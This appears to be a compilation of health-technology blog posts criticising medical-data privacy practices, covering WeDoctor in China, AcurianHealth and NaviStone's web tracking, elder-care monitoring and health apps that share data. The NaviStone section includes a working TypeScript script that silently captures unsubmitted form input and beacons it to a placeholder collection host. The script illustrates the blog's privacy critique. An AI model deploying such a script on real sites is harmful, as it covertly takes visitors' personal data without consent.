China’s getting set to be the healthcare AI leader–on the backs of sick, rural citizens’ data privacy

Picture this: a mobile health clinic arrives at a rural village in Jia County, in China’s Henan province. The clinic staff check the villagers, many of them elderly and infirm from their hard-working lives. The staff collect vital signs, take blood and urine samples, run ECGs, and perform other tests. It’s all free, unlike a trip to the hospital 30 miles away.

The catch: the data collected is uploaded to WeDoctor, a private healthcare company specializing in online medical diagnostics and related services, backed by Tencent, the Chinese technology conglomerate that is also heavily invested in AI. All that data goes into WeDoctor’s AI-powered cloud. The good part: the agreement with the local government that permits this also provides medical services, health insurance, pharmaceuticals and healthcare education to the local people. In addition, it creates an “auxiliary treatment system for general practice” database that Jia County doctors can access for local patients. According to the WIRED article on this, it’s impressive at an IBM Watson level: 

Doctors simply have to input a patient’s symptoms and the system provides them with suggested diagnoses and treatments, calculated from a database of over 5,000 symptoms and 2,000 diseases. WeDoctor claims that the system has an accuracy rate of 90 per cent.

and 

Dr Zhang Qiaofen, in nearby Ren Zhuang village, says the system has made her life easier. “Since WeDoctor came to my clinic, I feel more comfortable and have more confidence,” she says. “I’m thankful to the device for helping me make decisions.”
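
For readers wondering what sits behind a claim like that, the basic shape is simple: symptoms go in, ranked disease suggestions come out. Below is a purely illustrative sketch, in TypeScript, of the most naive possible version of such a symptom-to-diagnosis lookup. WeDoctor has not published its method, and the tiny ‘database’, disease names and scoring here are invented for the example.

```typescript
// Toy illustration only: scores each disease by how many of its known
// symptoms the patient reports. Real clinical decision-support systems
// are far more sophisticated than this.
type Disease = { name: string; symptoms: Set<string> };

// Hypothetical mini-database; a production system would hold thousands of entries.
const diseases: Disease[] = [
  { name: "influenza", symptoms: new Set(["fever", "cough", "muscle aches", "fatigue"]) },
  { name: "common cold", symptoms: new Set(["cough", "sneezing", "sore throat"]) },
  { name: "pneumonia", symptoms: new Set(["fever", "cough", "chest pain", "shortness of breath"]) },
];

function suggestDiagnoses(reported: string[], topN = 3): { name: string; score: number }[] {
  return diseases
    .map((d) => ({
      name: d.name,
      // Fraction of this disease's known symptoms that the patient reports.
      score: reported.filter((s) => d.symptoms.has(s)).length / d.symptoms.size,
    }))
    .filter((r) => r.score > 0)
    .sort((a, b) => b.score - a.score)
    .slice(0, topN);
}

// Example: a patient reporting fever and cough.
console.log(suggestDiagnoses(["fever", "cough"]));
```

A production system works over thousands of symptoms and diseases with far more sophisticated models, but the input and output shape (symptoms in, ranked suggestions out) is the same one the Jia County doctors describe.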

The bad part: the patients have no ability to consent to, or control over, the data, and there are no privacy restrictions on its use by WeDoctor, Tencent, or the Chinese government. Regional government officials are next pictured in the article reviewing data on Jia County’s citizens: village, gender, age, ailment, and whether or not a person has registered for a village health check. Yes, attending these health checks is mandatory for the villagers. 

What is happening is that China is building the world’s largest medical database, free of those pesky Western democracy privacy restrictions, and using AI/machine learning to create a massive set of diagnostic tools. The immediate application is to supplement its paucity of doctors and medical facilities (1.5 doctors per 1,000 people, compared with almost double that in the UK). All this is being built by an estimated 130 private companies as part of the “Made in China 2025” plan. Long term, the Chinese government gets to know even more intimate details about its 1.3 billion citizens, and these private companies can make money off the data. Such a deal! The difference between China’s attitude towards privacy and Western concerns about the same could not be greater. More on WeDoctor’s ambitions to be the Amazon of healthcare, and yes, to profit from this data, from Bloomberg. WeDoctor is valued at an incredible $5.5 billion. Hat tip to HISTalk’s Monday morning update.

Creepy data mining on medical conditions runs wild: where’s the privacy?

Ever heard of AcurianHealth? If you are in the US, you may get a letter inviting you into one of their research studies or drug trials based upon your prescriptions, your shopping habits, or your internet browsing. Where do they get that data? Quite legitimately, based on consent: Walgreens (part of Walgreens Boots Alliance) will mail invitations for studies organized by Acurian to its pharmacy customers, with the customer’s identity withheld from Acurian. The privacy policy under which Walgreens does business with you permits this type of contact. These letters direct users to a generic-sounding website for the study, and then life gets interesting. A visit to the site, whether from a letter, a search, or an online ad, may capture your information. A bit of code from a company Acurian works with, NaviStone, captures information from partial or never-sent information requests and signups. NaviStone then matches what you think is anonymous behavior against other databases, and voilà, mail is sent to you via its ‘proprietary technology.’ Acurian uses databases from large data brokers/aggregators like Epsilon and cranks away. It’s creepy behavior that stretches the definitions of privacy and consent. Not reassuring is that Acurian has a database of over 100 million people who have supposedly opted in. How a Company You’ve Never Heard of Sends You Letters about Your Medical Condition (Gizmodo). Hat tip to Toni Bunting
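
To make NaviStone-style collection concrete, here is a minimal, purely illustrative browser sketch, in TypeScript, of how a third-party script could record what a visitor types into a form even if the form is never submitted. This is not NaviStone’s actual code; the collection endpoint below is hypothetical.

```typescript
// Purely illustrative: record form fields as the visitor types, and send
// them even if the form is never submitted. NOT NaviStone's actual code;
// the endpoint is hypothetical.
const COLLECTOR_URL = "https://collector.example.com/capture"; // hypothetical endpoint

function watchForm(form: HTMLFormElement): void {
  const captured: Record<string, string> = {};

  // Record each field as the visitor types, keyed by the input's name (or id).
  form.querySelectorAll<HTMLInputElement | HTMLTextAreaElement>("input, textarea").forEach((field) => {
    field.addEventListener("input", () => {
      captured[field.name || field.id] = field.value;
    });
  });

  // If the visitor navigates away without submitting, send whatever was typed.
  // navigator.sendBeacon is designed to deliver data during page unload.
  window.addEventListener("beforeunload", () => {
    if (Object.keys(captured).length > 0) {
      navigator.sendBeacon(COLLECTOR_URL, JSON.stringify(captured));
    }
  });
}

// Attach to every form on the page.
document.querySelectorAll<HTMLFormElement>("form").forEach(watchForm);
```

The point is that no completed signup is required; a few keystrokes, later matched against commercial marketing databases, are enough to generate a very personal-looking letter.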

How technology can help fight elder abuse–ethically

The increasing awareness of abuse of older people by their caregivers, whether at home or in care homes/assisted living/nursing homes, invites discussion of the role that technology can play. This presentation by Malcolm J. Fisk, PhD, co-director of the Age Research Centre of Coventry University, in the BSG Ageing Bites series on YouTube looks at the relevant technologies by the level of control they leave with the older person and by how intrusive they are:

  • Social alarms, which include pull cords (nurse call) and PERS–what we think of as ‘1st generation’ telecare: high level of control, low intrusiveness–but often useless if the user cannot reach the alarm in an emergency
  • Activity monitoring, which can be room sensor-based or wearable (the 2nd generation): less control, slightly more intrusive–also dependent on someone monitoring the data and subject to false positives/negatives
  • Audio and video monitoring, while achieving greater security, are largely uncontrolled by the older person and highly intrusive to the point of unacceptability. (In fact, some feedback on tablet-based telehealth devices indicates that a built-in camera, even if not activated, can be regarded with suspicion and trigger unwanted reactions.)

The issues of consent, and of balancing the values of autonomy and privacy against factors such as cognitive impairment, personal safety and, this Editor would add, detecting attacks by strangers rather than caregivers, are explored here. How do we ethically observe yet respect individual privacy? This leads to a set of seven principles Dr Fisk has published on Emerald|Insight (unfortunately abstract access only) guiding the use of surveillance technologies within care homes. Video 11:03. Hat tip to Malcolm Fisk via Twitter.

Dr Topol’s prescription for The Future of Medicine, analyzed

The Future of Medicine Is in Your Smartphone sounds like a preface to his latest book, ‘The Patient Will See You Now’, but it is quite consistent with Dr Topol’s talks of late [TTA 5 Dec]. The article is at once optimistic–yes, we love the picture–yet somewhat unreal. When we walk around and kick the tires…

First, it flies in the face of increasing government control over healthcare providers’ outcomes and the shift, for good or ill, to ‘outcomes-based medicine’. Second, ‘doctorless patients’ may need fewer services, not more; why should these individuals, who at least initially represent the high-info elite, be penalized by having to pay the extremely high premiums dictated by government-approved health insurance (in the US, ACA-compliant insurance a/k/a Obamacare), or face the US tax penalties for not enrolling in same? Third, those liberating mass-market smartwatches and fitness trackers aren’t of clinical quality yet: fine directionally, but real clinical diagnosis (more…)

What happens when a medical app…vanishes?

You have just entered The App Twilight Zone… Our readers know that concussion and its diagnosis have been a focus of this Editor’s, and validating apps a focus of Editor Charles’, who brought this to my attention. The app’s name: The Sport Concussion Assessment Tool 2 (SCAT2). The news report states: “It contains all the essentials you would want in a concussion app: a graded symptoms checklist, cognitive testing, balance testing, Glasgow coma scale, Maddocks score, baseline score ability, serial evaluation, and password protected information-sharing via email.” The plot: it was deactivated without warning or notice by the developer, Inovapp (link to a sketchy CrunchBase profile), yet it is still listed on the iTunes store.

What happened? A modified standard (SCAT3) was developed in 2012, updating SCAT2 with non-critical additions: indications for emergency management, a slightly more extensive background section, a neck exam, and more detailed return-to-play instructions. SCAT3 is only available on (inconvenient) paper. No word from Inovapp on why it discontinued the app, nor on any plans to update it.

The SCAT2 had gained, in a short time, a following among coaches and sports medicine professionals because it was the first app based upon the international standard (3rd International Conference on Concussion in Sport, Zurich, 2008), transferring a paper assessment tool to an easy-to-use app. In fact, the NHL (National Hockey League) has its own version. The revised 2012 standard (SCAT3), as noted above, exists only on paper. Users have a right to be upset, but moreover, this points to a glaring shortcoming of medical apps: their developers vanishing into the night without a by-your-leave. And read the comments by (mainly) doctors on securing patient information after the app is used (HIPAA standards), and one physician’s criticism of apps such as this as a ‘crutch’. A Pointer to the Future we don’t want to see. The authors, Irfan Husain and Iltifat Husain, MD, are to be congratulated. Popular app being used to manage concussions fails, failing patients (iMedicalApps)

Eye feels the pain of Google’s Brin and Page

Oh, the discomfort that Sergey and Larry must be feeling at being grilled, er, interviewed by “billionaire venture capitalist Vinod Khosla” (grudgingly respected in TTA 30 May) at one of his eponymous Summits. Here they are with Google Glass in all sorts of adaptations, from Parkinson’s to gait improvement to surgery [see multiple TTA articles here], a ‘moonshot on aging and longevity’ dubbed Calico [TTA 19 Sept 13], and even a contact lens to measure blood glucose in tears [TTA 17 Jan]. All good stuff with Big Change potential. Instead they whinge on about how the health field is so regulated, and all the cool stuff you could do with the data but for that privacy thingy (those darn EU and UK regulations and, in the US, HIPAA). Page to Khosla: “I do worry that we regulate ourselves out of some really great possibilities that are certainly on the data-mining end.” Brin to Khosla: “Generally, health is just so heavily regulated. It’s just a painful business to be in. It’s just not necessarily how I want to spend my time.” Gee. Whiz. What is apparent here is a lack of respect for the privacy of us ‘little folks’ and our everyday, humdrum lives.

Advice straight from The Gimlet Eye: My dear boys, you’ll just have to get people’s data with that old-fashioned thing, permission. (And you’d be surprised how many would be happy to give it to you.) Or if it’s all too painful, Sergey can play with his superyacht and latest girlfriend, and follow his estranged wife Anne Wojcicki’s 23andme in its ongoing dealings with the FDA. At least she’s in the arena. Google leaders think health is ‘a painful business to be in’ (SFGate). Mobihealthnews covers their true confessions, with an interesting detour in the final third of the article to Mr Khosla’s view of Ginger.io’s surprising pilot with Kaiser, and then to WellDoc’s BlueStar diabetes therapy app, the only one that is 510(k) Class II and registered as a pharmaceutical product [TTA 10 Jan]. Also interesting re the Googlers’ mindset is an SFGate blog piece on Larry Page’s attitudes towards leisure and work in a Keynes-redux ‘vision of the future‘. Less work + more people may = more leisure, but certainly much less money ($, £, €, ¥) for even the well-educated and managerial!

Are mHealth apps sharing your data with pharma and insurance companies?

As a further postscript to our recent post on mHealth apps, the Financial Times has just published an article offering a worrying new angle. According to the FT, the “top 20” health & wellness apps are sharing data on you with third parties that, the FT reckons, may include pharmaceutical and insurance companies.

They report that: “Regulations bar the tracking and selling of individuals’ specific medical and prescription records. Yet some companies are figuring out ways around those restrictions by building digital health profiles about people based on their use of the web and mobile apps.”

Perhaps a case of reading those Ts & Cs carefully before pressing ‘accept’?

The amazing lightness of Google’s Being There vs The Private Eye

Perhaps it is The Google Gimlet Eye’s peevishness at this late hour, but mentioning this company in conjunction with ‘privacy’ lately makes the Eye Goggle. First there is the sheer howling irony of chairman Eric Schmidt’s interesting definition of the Digital Dark Side in this past weekend’s Wall Street Journal, a state of data mining and real-time behavioral monitoring that applies to totalitarian regimes like North Korea, Iran or (more…)